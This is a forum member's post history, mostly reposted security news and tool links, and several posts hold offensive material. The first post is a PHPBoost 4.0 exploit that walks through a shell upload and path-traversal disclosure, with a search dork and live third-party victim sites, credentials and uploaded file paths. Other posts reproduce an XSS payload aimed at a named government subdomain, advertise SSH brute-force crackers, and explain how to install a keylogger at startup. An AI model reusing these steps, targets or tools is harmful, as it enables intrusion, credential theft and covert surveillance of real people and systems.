Fi8sVrs

Active Members
  • Posts: 3206
  • Days Won: 87

Everything posted by Fi8sVrs

  1. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [Inj3ct0r ASCII-art banner]
    >> Exploit database separated by exploit type (local, remote, DoS, etc.)
    [+] Site : 1337day.com
    [+] Support e-mail : submit[at]1337day.com
    #########################################
    I'm KedAns-Dz member from Inj3ct0r Team
    #########################################
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    ###
    # Title : PHPBoost 4.0 <= (FileUpload/Disclosure) Multiple Vulnerabilities
    # Author : KedAns-Dz
    # E-mail : ked-h (@hotmail.com / @1337day.com)
    # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
    # Web Site : www.1337day.com
    # FaCeb0ok : http://fb.me/Inj3ct0rK3d
    # TwiTter : @kedans
    # Friendly Sites : www.r00tw0rm.com * www.exploit-id.com
    # Platform/CatID : php - remote - Multiple
    # Type : php - proof of concept - webapp 0day
    # Tested on : Windows7
    # Download : [http://www.phpboost.com/download/download.php]
    # Vendor : [www.phpboost.com]
    ###
    # <3 <3 Greetings t0 Palestine <3 <3
    # F-ck HaCking, Lov3 Explo8ting !
    ######## [ Proof / Exploit ] ################|=>
    # Google Dork :
    ---------------
    = allintext:"Boosté par PHPBoost 4.0"
    # Start ... Create new User
    --------
    = http://127.0.0.1/phpboost/user/?url=/registration/
    # Remote File Upload :
    ----------------------
    + Go to see News page =>
    = http://127.0.0.1/phpboost/news/news.php
    + Post new news =>
    = http://127.0.0.1/phpboost/news/management.php?new=1&cat=0
    + Push Upload attach, and upload your file/Shell ( ex k.txt ) !
    proof img : (http://oi45.tinypic.com/ay2cs7.jpg)
    ! Find your file, ex:
    = http://127.0.0.1/phpboost/upload/k.txt
    Demo :
    ***************************************
    http://asylumspecimens.olympe.in
    user : ked pass : 123456
    http://asylumspecimens.olympe.in/upload/k.txt
    ***********************************************
    # Full Information Disclosure :
    ---------------------------------
    = http://127.0.0.1/phpboost/user/?url=/../../KedAns
    ! You get an error page; in the page content you see some php.ini content such as server information, the full path, etc.
    proof img : (http://oi49.tinypic.com/2l00g.jpg)
    Demos :
    ************************************************
    http://shura-fansub.rd-h.com/user/?url=/../../KedAns
    http://asylumspecimens.olympe.in/user/?url=/../../KedAns
    **********************************************************
    # Sp. GreetS t0 : Elite_Trojan & Evil-Dz & all Dz_Mafia Cr3w <3
    #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]========
    # Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
    # NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all
    # Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
    # packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * B.N.T * All Security and Exploits Webs
    #=====================================================
    Source: PHPBoost 4.0 Shell Upload - Intelligent Exploit
  2. jRecorder
    Author: Sajith Amma
    Description: jRecorder is a jQuery plugin to enable a Flash recorder in your web pages. You DON'T need to have a Flash streaming server or RED5 server to do this recording.
    Project Documentation: jRecorder - jQuery Plugin
    Example Implementation: jRecorder Example
    Author Domain: Programming Ideas, Logic, Tricks and Tips
    https://github.com/sythoos/jRecorder/
  3. forum animale - Google Search. Close it.
  4. Authored: Blake
    Site: soldierx.com
    wdivulge is a tool designed to find and download hidden files from a webserver. This is most commonly pictures, but you can adjust the file definitions to bruteforce any type of file that you'd like. wdivulge technically falls under the definition of a web fusker.
    Download: WDivulge Hidden File Web Scanner ≈ Packet Storm
  5. Recently, EHN received a news report from Tunisian Cyber Army and Al Qaida Electronic Army in which the hackers claimed to have infected the Pentagon administrator, as part of their ongoing operation called "#opBlackSummer". The attack happened after hackers identified a reflected cross-site scripting (XSS) vulnerability in one of the subdomains of the Pentagon (g1arng.army.pentagon.mil).
    POC: g1arng.army.pentagon.mil/Programs/Pages/Default.aspx?Category="><script>alert("xss by tca and AQECA on pentagon")</script>
    The hacker managed to exploit this vulnerability for sending a malicious payload to the admin of the Pentagon. Hackers claim that they succeeded in infecting them. Hackers said they compromised some important files and stole cookies from the Pentagon mail. The security breach was done in collaboration with Chinese hackers. At the time of writing, the vulnerability is not fixed. If the TCA claim is true, then this will be the best example that demonstrates the severity of a simple reflected XSS. Yesterday, I sent a notification to the Pentagon team about the vulnerability but there is no response from them. In another mail, the team said they have hacked state.gov with an SQL injection vulnerability.
    Source: Hackers infect Pentagon admin by exploiting XSS vulnerability | Hacking News | Security updates
  6. Coding Freedom: The Ethics and Aesthetics of Hacking
    E. Gabriella Coleman
    Contents:
    Acknowledgments
    Introduction: A Tale of Two Worlds
    Part I: Histories
    Chapter 1: The Life of a Free Software Hacker
    Chapter 2: A Tale of Two Legal Regimes
    Part II: Codes of Value
    Chapter 3: The Craft and Craftiness of Hacking
    Chapter 4: Two Ethical Moments in Debian
    Part III: The Politics of Avowal and Disavowal
    Chapter 5: Code Is Speech
    Conclusion: The Cultural Critique of Intellectual Property Law
    Epilogue: How to Proliferate Distinctions, Not Destroy Them
    Notes, References, Index
    Download: http://www.filehost.ro/29348407/Coding_Freedom_epub/
  7. https://rstforums.com/forum/53795-poli-ia-desf-oar-12-perchezi-ii-n-r-ndul-hackerilor-rom-nia.rst#post358140
  8. Security Override - Hacking Challenges These challenges are designed to put your hacking skills to the test. For each challenge completed you will receive points based on the level of the challenge. The Scoreboard will keep track of your points so you know where you rank among other SecurityOverride members. Your profile will also be updated as challenges are completed to include your total points and a list of the challenges you have successfully completed. Welcome to wixxerd.com
  9. As you may have read, there's been a recent uptick in large-scale security attacks aimed at U.S. technology and media companies. Within the last two weeks, the New York Times and Wall Street Journal have chronicled breaches of their systems, and Apple and Mozilla have turned off Java by default in their browsers.
    This week, we detected unusual access patterns that led to us identifying unauthorized access attempts to Twitter user data. We discovered one live attack and were able to shut it down in process moments later. However, our investigation has thus far indicated that the attackers may have had access to limited user information – usernames, email addresses, session tokens and encrypted/salted versions of passwords – for approximately 250,000 users.
    As a precautionary security measure, we have reset passwords and revoked session tokens for these accounts. If your account was one of them, you will have recently received (or will shortly) an email from us at the address associated with your Twitter account notifying you that you will need to create a new password. Your old password will not work when you try to log in to Twitter.
    Though only a very small percentage of our users were potentially affected by this attack, we encourage all users to take this opportunity to ensure that they are following good password hygiene, on Twitter and elsewhere on the Internet. Make sure you use a strong password – at least 10 (but more is better) characters and a mixture of upper- and lowercase letters, numbers, and symbols – that you are not using for any other accounts or sites. Using the same password for multiple online accounts significantly increases your odds of being compromised. If you are not using good password hygiene, take a moment now to change your Twitter passwords. For more information about making your Twitter and other Internet accounts more secure, read our Help Center documentation or the FTC's guide on passwords.
    We also echo the advisory from the U.S. Department of Homeland Security and security experts to encourage users to disable Java on their computers in their browsers. For instructions on how to disable Java, read this recent Slate article.
    This attack was not the work of amateurs, and we do not believe it was an isolated incident. The attackers were extremely sophisticated, and we believe other companies and organizations have also been recently similarly attacked. For that reason we felt that it was important to publicize this attack while we still gather information, and we are helping government and federal law enforcement in their effort to find and prosecute these attackers to make the Internet safer for all users.
    Updated 4:47pm: Corrected detail on disabling Java in penultimate paragraph.
    Posted by Bob Lord (@boblord), Director of Information Security
    Via Twitter Blog: Keeping our users secure
  10. HostBox SSH is an SSH password/account scanner written in Python.
    README

    2.0 Install

    INSTALLING WXPYTHON
    -------------------
    http://wiki.wxpython.org/InstallingOnUbuntuOrDebian

    INSTALLING PARAMIKO
    -------------------
    sudo apt-get install python-paramiko

    3.0 Usage

    To run HB in GUI mode:
    ---------------------
    ./HostBox-SSH.py
    Should start the GUI; alternatively try "python HostBox-SSH.py" or "chmod +x HostBox-SSH.py && ./HostBox-SSH.py".

    To run HB in Console mode:
    -------------------------
    ./HostBox-SSH -h    (help with command line options)

    Command line options:
    HostBox-SSH.py -i <ip list> -u user1,user2,user3.. -p pass1,pass2,pass3.. [-1/-2] [-n/-f]

    Username Options: -u user1,user2,user3.. || --ufile=usernames.txt
    Password Options: -p pass1,pass2,pass3.. || --pfile=passwords.txt
    Break Options: -1: Break on account login   -2: Break on server login
    Speed Options: -n for normal scan || -f for fast scan mode

    Examples:
    ./HostBox.py -i ip-list.txt -u guest,test,root -p blank,-username,password -1 -n
    This is running hostbox listing usernames and password settings on the commandline. -1 is break account testing when a login is found for that account. -n means normal scan speed.

    ./HostBox.py -i ip-list.txt --ufile=usernames.txt --pfile=passwords.txt -2 -f
    This is running hostbox listing usernames and passwords from a textfile. -2 means the scanner will break testing the server when a login is found for that server. -f is for fast scan mode or multithreaded scan.

    "-username" and "blank" in the username/password spec tells the scanner to use the username as password / check for blank passwords.

    VISIT OSKAR STRIDSMAN'S IT RESOURCE -- StridsmanIT.wordpress.com -- HostBox-SSH 0.2
    REPORT BUGS TO: https://stridsmanit.wordpress.com/ssh-scanner/
    Download: HostBox SSH 0.2 ≈ Packet Storm
  11. The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually. Windows installer.
    Changes: An integrated add-ons marketplace, a new Ajax spider, Session scope, and various other features and improvements have been added.
    Download ZAP_2.0.0_Windows.exe (71 MB)
    Download ZAP_2.0.0_Mac_OS_X.zip (126.7 MB)
    Download ZAP_2.0.0_Linux.tar.gz (76.6 MB)
    Sources: https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
    Security Tool Files ≈ Packet Storm
  12. This Python-based tool is a disassembler for the Atmel MARC4 (a 4-bit Harvard micro). marc4dasm.py:

```python
#! /usr/bin/env python3
# marc4dasm.py - disassemble Atmel MARC4
#
# Adam Laurie <adam@aperturelabs.com>
# http://www.aperturelabs.com
#
# This code is copyright (c) Aperture Labs Ltd., 2013, All rights reserved.
#
# This code is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
import sys

# Comments: one line of description per opcode, emitted as a Forth comment
COMM = {
    0x00: 'Add the top 2 stack digits',
    0x01: 'Add with carry the top 2 stack digits',
    0x02: "2's complement subtraction of the top 2 digits",
    0x03: "1's complement subtraction of the top 2 digits",
    0x04: 'Exclusive-OR top 2 stack digits',
    0x05: 'Bitwise-AND top 2 stack digits',
    0x06: 'Equality test for top 2 stack digits',
    0x07: 'Inequality test for top 2 stack digits',
    0x08: 'Less-than test for top 2 stack digits',
    0x09: 'Less-or-equal for top 2 stack digits',
    0x0A: 'Greater-than for top 2 stack digits',
    0x0B: 'Greater-or-equal for top 2 stack digits',
    0x0C: 'Bitwise-OR top 2 stack digits',
    0x0D: 'Copy condition code onto TOS',
    0x0E: 'Restore condition codes',
    0x0F: "CPU in 'sleep mode', interrupts enabled",
    0x10: 'Shift TOS left into carry',
    0x11: 'Rotate TOS left through carry',
    0x12: 'Shift TOS right into Carry',
    0x13: 'Rotate TOS right through carry',
    0x14: 'Increment TOS',
    0x15: 'Decrement TOS',
    0x16: 'Decimal adjust for addition (in BCD arithmetic)',
    0x17: "1's complement of TOS",
    0x18: 'Toggle Branch flag',
    0x19: 'Set Branch and Carry flag',
    0x1A: 'Disable all interrupts',
    0x1B: 'Read 4-bit I/O port to TOS',
    0x1C: 'Decrement index on return stack',
    0x1D: 'Return from interrupt routine; enable all interrupts',
    0x1E: 'Software interrupt',
    0x1F: 'Write TOS to 4-bit I/O port',
    0x20: 'Fetch an 8-bit ROM constant and performs an EXIT to Ret_PC',
    0x21: 'Fetch an 8-bit ROM constant and performs an EXIT to Ret_PC',
    0x22: 'Move (loop) index onto Return Stack',
    0x23: 'Copy (loop) index from the Return Stack onto TOS',
    0x24: "Return from subroutine (';')",
    0x25: "Return from subroutine (';')",
    0x26: 'Exchange the top 2 digits',
    0x27: 'Push a copy of TOS-1 onto TOS',
    0x28: 'Move top 2 digits onto Return Stack',
    0x29: 'Move top 3 digits onto Return Stack',
    0x2A: 'Copy 2 digits from Return to Expression Stack',
    0x2B: 'Copy 3 digits from Return to Expression Stack',
    0x2C: 'Move third digit onto TOS',
    0x2D: 'Duplicate the TOS digit',
    0x2E: 'Remove TOS digit from the Expression Stack',
    0x2F: 'Remove one entry from the Return Stack',
    0x30: 'Indirect fetch from RAM addressed by the X register',
    0x31: 'Indirect fetch from RAM addressed by preincremented X register',
    0x32: 'Indirect fetch from RAM addressed by the postdecremented X register',
    0x33: 'Direct fetch from RAM addressed by the X register',
    0x34: 'Indirect fetch from RAM addressed by the Y register',
    0x35: 'Indirect fetch from RAM addressed by preincremented Y register',
    0x36: 'Indirect fetch from RAM addressed by postdecremented Y register',
    0x37: 'Direct fetch from RAM addressed by the Y register',
    0x38: 'Indirect store into RAM addressed by the X register',
    0x39: 'Indirect store into RAM addressed by pre-incremented X register',
    0x3A: 'Indirect store into RAM addressed by the postdecremented X reg.',
    0x3B: 'Direct store into RAM addressed by the X register',
    0x3C: 'Indirect store into RAM addressed by the Y register',
    0x3D: 'Indirect store into RAM addressed by pre-incremented Y register',
    0x3E: 'Indirect store into RAM addressed by the post-decremented Y reg.',
    0x3F: 'Direct store into RAM addressed by the Y register',
    0x70: 'Fetch the current Expression Stack Pointer',
    0x71: 'Fetch current Return Stack Pointer',
    0x72: 'Fetch current X register contents',
    0x73: 'Fetch current Y register contents',
    0x74: 'Move address into the Expression Stack Pointer',
    0x75: 'Move address into the Return Stack Pointer',
    0x76: 'Move address into the X register',
    0x77: 'Move address into the Y register',
    0x78: 'Set Expression Stack Pointer',
    0x79: 'Set return Stack Pointer direct',
    0x7A: 'Set RAM address register X direct',
    0x7B: 'Set RAM address register Y direct',
    0x7C: 'No operation',
}

# Zero Address Instructions (single byte, no operand)
ZAI = {
    0x00: 'ADD', 0x01: 'ADDC', 0x02: 'SUB', 0x03: 'SUBB', 0x04: 'XOR', 0x05: 'AND',
    0x06: 'CMP_EQ', 0x07: 'CMP_NE', 0x08: 'CMP_LT', 0x09: 'CMP_LE', 0x0A: 'CMP_GT',
    0x0B: 'CMP_GE', 0x0C: 'OR', 0x0D: 'CCR@', 0x0E: 'CCR!', 0x0F: 'SLEEP',
    0x10: 'SHL', 0x11: 'ROL', 0x12: 'SHR', 0x13: 'ROR', 0x14: 'INC', 0x15: 'DEC',
    0x16: 'DAA', 0x17: 'NOT', 0x18: 'TOG_BF', 0x19: 'SET_BCF', 0x1A: 'DI', 0x1B: 'IN',
    0x1C: 'DECR', 0x1D: 'RTI', 0x1E: 'SWI', 0x1F: 'OUT',
    0x20: 'TABLE', 0x21: '---', 0x22: '>R', 0x23: 'I', 0x24: '---', 0x25: 'EXIT',
    0x26: 'SWAP', 0x27: 'OVER', 0x28: '2>R', 0x29: '3>R', 0x2A: '2R@', 0x2B: '3R@',
    0x2C: 'ROT', 0x2D: 'DUP', 0x2E: 'DROP', 0x2F: 'DROPR',
    0x30: '[X]@', 0x31: '[+X]@', 0x32: '[X-]@', 0x34: '[Y]@', 0x35: '[+Y]@', 0x36: '[Y-]@',
    0x38: '[X]!', 0x39: '[+X]!', 0x3A: '[X-]!', 0x3C: '[Y]!', 0x3D: '[+Y]!', 0x3E: '[Y-]!',
    0x70: 'SP@', 0x71: 'RP@', 0x72: 'X@', 0x73: 'Y@', 0x74: 'SP!', 0x75: 'RP!',
    0x76: 'X!', 0x77: 'Y!', 0x7C: 'NOP', 0x7D: '---', 0x7E: '---', 0x7F: '---',
}

# Long RAM Address Instructions (INS $XX): one-byte RAM address operand
LRAI = {
    0x33: '[>X]@', 0x3B: '[>X]!', 0x3F: '[>Y]!', 0x37: '[>Y]@',
    0x78: '>SP', 0x79: '>RP', 0x7A: '>X', 0x7B: '>Y',
}

# CALL $nXX and BRANCH $nXX: the low nibble of the opcode is the high nibble of a
# 12-bit ROM address, the following byte is the low 8 bits.  CALL occupies the whole
# 0x40-0x4F opcode range and BRANCH the whole 0x50-0x5F range.
CALL = {op: 'CALL' for op in range(0x40, 0x50)}
BRANCH = {op: 'BRA' for op in range(0x50, 0x60)}

# LITERAL 0-F: push the low nibble of the opcode
LIT = {0x60 + n: 'LIT_%X' % n for n in range(16)}

# Fixed ROM addresses (reset and interrupt vectors)
ROMADD = {
    0x000: '$AUTOSLEEP', 0x008: '$RESET',
    0x040: 'INTERRUPT_0', 0x080: 'INTERRUPT_1', 0x0C0: 'INTERRUPT_2', 0x100: 'INTERRUPT_3',
    0x140: 'INTERRUPT_4', 0x180: 'INTERRUPT_5', 0x1C0: 'INTERRUPT_6', 0x1E0: 'INTERRUPT_7',
}

# Variables in RAM (as yet unknown), filled in by the first pass
RAMADD = {}

# Short branch inside current page: 0x80 - 0xBF (SBRA $XXX)
# Short subroutine CALL into 'zero page': 0xC0 - 0xFF (SCALL $XXX)
# both dealt with entirely in the pass code below


def print_with_comment(address, data, ins, arg, comment):
    """Print one disassembled line: address, raw bytes, mnemonic, Forth comment."""
    if arg is not None:
        arg = '%02X' % arg
    else:
        arg = '  '
    if not Quiet:
        address = '%04X  ' % address
        original = '%02X %s  ' % (ins, arg)
    else:
        address = ''
        original = ' '
    pad = ' ' * (40 - len(data))
    if comment:
        print('%s%s %s %s \\ %s' % (address, original, data, pad, comment))
        return
    if ins in COMM:
        print('%s%s %s %s \\ %s' % (address, original, data, pad, COMM[ins]))
    else:
        print('%s%s %s %s \\ %s' % (address, original, data, pad, 'Illegal instruction!'))


# setup
if len(sys.argv) < 2:
    print()
    print('usage: %s <INFILE> [QUIET]' % sys.argv[0])
    sys.exit()

# start main code: read the ROM image as bytes (indexing yields ints)
with open(sys.argv[1], 'rb') as infile:
    data = infile.read()
Quiet = len(sys.argv) == 3 and sys.argv[2].upper() == 'Q'

# first pass - create labels
p = 0
label = 0
rams = 0
# last two bytes are CRC
while p < len(data) - 2:
    x = data[p]
    code_add = p
    p += 1
    # skip over instructions that have no args or implicit addresses
    if x in ZAI or x in LIT:
        continue
    # create address labels for everything else...
    if x in CALL or x in BRANCH:
        address = data[p] + ((x & 0x0f) << 8)
        p += 1
        if address not in ROMADD:
            ROMADD[address] = 'LABEL_%03X' % label
            label += 1
        continue
    if x in LRAI:
        address = data[p]
        p += 1
        if address not in RAMADD:
            RAMADD[address] = 'VAR_%02X' % rams
            rams += 1
        continue
    if 0x80 <= x <= 0xBF:
        # Short branch inside current page (a page is 64 bytes); computed from the
        # instruction's own address, exactly as the disassembly pass does
        address = code_add - (code_add % 64) + (x - 0x80)
    else:
        # Short subroutine CALL into 'zero page':
        # ROM is 64 evenly spaced addresses between 0x00 and 0x1F8
        address = (x - 0xC0) * (0x200 // 64)
    if address not in ROMADD:
        ROMADD[address] = 'LABEL_%03X' % label
        label += 1

# second pass - look for orphan code (chunks of code that are never directly called)
p = 1
orphan = 0
while p < len(data) - 2:
    x = data[p]
    prev = data[p - 1]
    # previous instruction was UNUSED (0xC1), EXIT or RTI
    if x != 0xC1 and prev in (0xC1, 0x25, 0x1D) and p not in ROMADD:
        ROMADD[p] = 'ORPHAN_%03X' % orphan
        orphan += 1
    p += 1

# output address tables (as Forth comments)
print('\\')
print('\\')
print('\\ %s' % sys.argv[1])
print('\\')
print('\\')
print('\\ ROM ADDRESS   LABEL')
print('\\')
for address in sorted(ROMADD):
    print('\\ $%03X         %s' % (address, ROMADD[address]))
print('\\')
print('\\')
print('\\')
print('\\ RAM VARIABLE  LABEL')
print('\\')
for address in sorted(RAMADD):
    print('\\ $%02X          %s' % (address, RAMADD[address]))
print('\\')
print('\\')
print('\\')
print('\\')

# third pass - disassemble
p = 0
while p < len(data) - 2:
    ins = data[p]
    arg = None
    code_add = p
    # print labels
    if p in ROMADD:
        if not Quiet:
            out = '%04X\n' % p
            out += '%04X  ORIGIN $%03X\n' % (p, p)
            out += '%04X  : %s' % (p, ROMADD[p])
        else:
            out = '\n'
            out += 'ORIGIN $%03X\n' % p
            out += ': %s' % ROMADD[p]
        print(out)
    # Zero Address Instructions
    if ins in ZAI:
        p += 1
        print_with_comment(code_add, ZAI[ins], ins, arg, '')
        continue
    # Long RAM Address Instructions (INS $XX)
    if ins in LRAI:
        p += 1
        arg = data[p]
        p += 1
        out = '%s %s' % (LRAI[ins], RAMADD[arg])
        print_with_comment(code_add, out, ins, arg, '')
        continue
    # CALL $nXX
    if ins in CALL:
        p += 1
        arg = data[p]
        p += 1
        address = ((ins & 0x0f) << 8) + arg
        out = '%s %s' % (CALL[ins], ROMADD[address])
        print_with_comment(code_add, out, ins, arg, 'Unconditional long CALL ($%03X)' % address)
        continue
    # BRANCH $nXX
    if ins in BRANCH:
        p += 1
        arg = data[p]
        p += 1
        address = ((ins & 0x0f) << 8) + arg
        out = '%s %s' % (BRANCH[ins], ROMADD[address])
        print_with_comment(code_add, out, ins, arg, 'Conditional long branch ($%03X)' % address)
        continue
    # Literal
    if ins in LIT:
        p += 1
        print_with_comment(code_add, LIT[ins], ins, arg,
                           'Push literal/constant $%01X onto TOS' % (ins & 0x0F))
        continue
    # Short BRANCH inside current page
    if 0x80 <= ins <= 0xBF:
        # current page is 64 bytes
        address = p - (p % 64) + (ins - 0x80)
        p += 1
        out = 'SBRA %s' % ROMADD[address]
        print_with_comment(code_add, out, ins, arg, 'Conditional short branch in page ($%03X)' % address)
        continue
    # Short subroutine CALL into 'zero page'
    if 0xC0 <= ins <= 0xFF:
        p += 1
        # ROM is 64 evenly spaced addresses between 0x00 and 0x1F8
        address = (ins - 0xC0) * (0x200 // 64)
        out = 'SCALL %s' % ROMADD[address]
        print_with_comment(code_add, out, ins, arg, 'Unconditional short CALL ($%03X)' % address)
        continue
    # code should never reach here!
    p += 1
    print_with_comment(code_add, '???', ins, arg, 'UNKNOWN')

# check CRC (only we can't because we don't know the algorithm!)
crc0 = data[p]
p += 1
crc1 = data[p]
print()
print('CRC: %02X %02X' % (crc0, crc1))
```

    Atmel MARC4 Disassembler ≈ Packet Storm
    https://github.com/ApertureLabsLtd/marc4dasm
  13. The PokerAgent botnet was discovered in 2012 by ESET Security Research Lab. It is a Trojan horse designed to harvest Facebook log-on credentials, also collecting information on credit card details linked to the Facebook account and Zynga Poker player stats. According to the latest report, the botnet is still active, mostly in Israel: 800 computers were infected and over 16194 Facebook credentials were stolen. The Trojan is active with many variants and belongs to the MSIL/Agent.NKY family. ESET reveals that the Trojan is coded in C# and is easy to decompile. After deep analysis, the team found that the bot connects to the C&C server. On command, the Trojan accesses the victim's Facebook account and collects the Zynga Poker stats and the number of payment methods (i.e. credit cards) saved in the Facebook account. Once collected, the information is sent back to the C&C server. The Trojan is downloaded onto the system by another downloader component. This downloader component was seen on the web and the victims have been fooled into downloading it. ESET's tracking of the botnet revealed that at least 800 computers have been infected with the Trojan and that the attacker had at least 16194 unique entries in his database of stolen Facebook credentials by March 20, 2012. "We advise careful consideration before allowing a browser or other app to 'remember' passwords for sensitive services and before storing credit card details into any application (not only Facebook!)," ESET advises.
    Via PokerAgent botnet stole over 16,000 Facebook credentials - Hacking News
  14. [*] SSH Brute-force by MMxM
    Usage: ./ssh-crack.php <host> <user> <wordlist>
    Download: http://www.fileshare.ro/e29225522
    Mirror: http://www.4shared.com/zip/F5gKTGjA/ssh-crack.html
  15. spy_tux - a simple keylogger for linux
    ========================================
    compilation
    -------------
    add the path of the "event" file of your keyboard (which is in the "/dev/input/" folder; most probably it is "event3"), your "admin password", the path of your ".data" file and the path of your ".keys" file to the corresponding places in the source code and compile it using the make command.
    usage
    -------
    after compiling it, copy it to the "/usr/bin" directory using
    sudo cp spy_tux /usr/bin
    and run it using the "spy_tux" command on the terminal:
    spy_tux
    then the key logger will be started. the keystrokes will be recorded in the ".data" file. add this command as a start up application to start it correspondingly.
    more info: http://www.inf0warri0r.blogspot.com
    tcg.galahena@gmail.com
    licenses:
    ----------
    Copyright 2012 Tharindra Galahena. This file is part of spy_tux. spy_tux is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or any later version. spy_tux is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with spy_tux. If not, see Licenses - GNU Project - Free Software Foundation (FSF).
    Download
  16. Exploit Development video series:
    1. Exploit Development - Part 1 (Concepts). **This video and Part 2 Segment 1 are more lecture based videos.** I recommend watching in full-screen due to quality issues. This is part 1 of 5. More to come over the next few weeks. Also, sorry about how I was talking in the video, I'm not a strong
    2. Exploit Development - Part 2a (Shellcode); Exploit Development - Part 2b (Shellcode)
    3. Exploit Development - Part 3 (Fuzzing)
    4. Exploit Development - Part 4 (Disassembly/Reversing). Reverse Engineering is a very broad category, and in its own right deserves its own video series. The steps I go through in this video are more for mapping out a program, rather than editing asm code to change execution flow.
    5. Exploit Development - Part 5a (Putting It All Together); Exploit Development - 5b (Putting It All Together)
  17. Hack.me is a FREE, community based project powered by eLearnSecurity. The community allows you to build, host and share vulnerable web application code for educational and research purposes. It aims to be the largest collection of "runnable" vulnerable web applications, code samples and CMSs online. The platform is available without any restriction to any party interested in Web Application Security: students, universities, researchers, penetration testers and web developers.
    Features: Upload your own code; Online IDE for PHP & MySQL; Your code hosted in the cloud; FREE!!; Practice webapp security; Isolated environment; Online: nothing to download!
    Safety: Every time you run a new Hackme the site will initiate a new sandbox for you. You will get isolated access to it so that you will always know that the application is safe for you to use. No other students can add malware or exploits in your sandbox. This ensures 99% safety. What about the 1%? While the team makes the best effort to moderate each and every new web app uploaded on Hack.me, chances are that something can and will slip through. If you are not 100% comfortable trusting us or the Hackme developer, please just run new Hackmes from a virtual machine or from a non-production OS.
    We have written about a variety of web apps where you can practice your hack-fu such as: Bodgeit Store, Jarlsberg, WackoPicko, Damn Vulnerable Web Application (DVWA), Vicnum, Metasploitable.
    So head over to hack.me and see what you think: http://hack.me
    Hack.me - Build, Host & Share Vulnerable Web Application Code - Darknet - The Darkside
  18. iptables is built on top of netfilter, the packet alteration framework for Linux 2.4.x and 2.6.x. It is a major rewrite of its predecessor ipchains, and is used to control packet filtering, Network Address Translation (masquerading, port forwarding, transparent proxying), and special effects such as packet mangling.
    Changes: This release adds support for the Day Transition Ignore option in xt_time.
    Download: Linux IPTables Firewall 1.4.17 ≈ Packet Storm
  19. Third Pwnium contest offers hackers a piece of the pie
    Google has announced the target for its third Pwnium hacking contest, to be held at this year's CanSecWest security conference, with $3.14159m in prize money for the researchers who can successfully crack its Chrome OS operating system. And yes, that figure is derived from the first six digits of π.
    The contest, to be held on March 7, will see hackers trying to subvert the operating system on a base specification Samsung 550 Chromebook running Wi-Fi. Google is offering $110,000 for a browser or system level compromise delivered via a web page, and $150,000 if the crack survives a reboot of the system. In order to claim the cash, researchers must provide Google with the full list of vulnerabilities used in the attack, along with any code used. Partial prizes will be offered for semi-successful hacks, at the Chocolate Factory's discretion.
    "We believe these larger rewards reflect the additional challenge involved with tackling the security defenses of Chrome OS, compared to traditional operating systems," said Chris Evans of the Google Chrome security team in a post on the Chromium blog.
    Google is already sponsoring the other hacking contest at the conference, Pwn2Own, and is putting its Chrome browser in the firing line with $100,000 for a successful exploit – plus the laptop that the browser is successfully cracked on.
    While the prize money for both contests has never been higher, it's still a very good deal for Google and others who are stumping up the cash. Time and again the security industry has found holes in commercial code that the writers never even dreamed of, and splashing out a few million is well worth it if Google can bolster its defenses further. The company offered $1m for its first Pwnium contest, and upped that to $2m last year at the second competition at the Hack in the Box conference in Kuala Lumpur.
    But the Chocolate Factory is unlikely to pay out the full amount this time, since Chrome OS should prove more difficult to crack than Google's browser. When Google launched Chrome OS, it boasted that the operating system was the most secure on the market, saying the mix of hardware and software modules on the machines makes a lot of current attack techniques invalid. That said, the research community has been known to pull some major surprises, and Google might face a bigger payday than it anticipates. ®
    Via Google offers $3.14159 MILLION in prizes for hacking Chrome OS • The Register
  20. Do you remember the craze of free SMS messages sent from the Internet? You would create an account and could send one or three free SMS messages a day. That is long gone, with operators currently offering a very large number of in-network SMS messages. In this context comes the SMS Gratuit Romania application, an Android application whose description is in its name. It requires an Internet connection and works with all five mobile networks in our country. Installation is very fast and the user is greeted with a simple interface. The accepted phone number starts with 07 and can be taken from the contacts list. The message box can be filled with 130 characters. The other 30 are used by the developer to insert an advertisement. This is the compromise the user has to make. One more advertisement has been introduced in the program's interface. It seems these are the developer's sources of income. The SMS Gratuit Romania application is compatible with Android 2.2 and newer and can be downloaded from here. Source
  21. Free VPN

      VPN Type: PPTP
      VPN Server Hostname: freevpnhosting.com
      VPN Username: freevpnhosting.com
      VPN Password: http://freevpnhosting.com/#freevpnaccount (updated daily)
  22. Facebook today announced that it has opened registration for the Hacker Cup, its annual competition for programmers with a $10,000 top prize, up from $5,000 last year, for the best of them all. Facebook holds the Hacker Cup in rounds, starting first online and then culminating in a final onsite round at Facebook's HQ in Menlo Park, CA for the top 25 programmers. This year's preliminary rounds will be held between January 25 and February 16. Facebook will fly the top 25 for the onsite final round that takes place March 22-23.

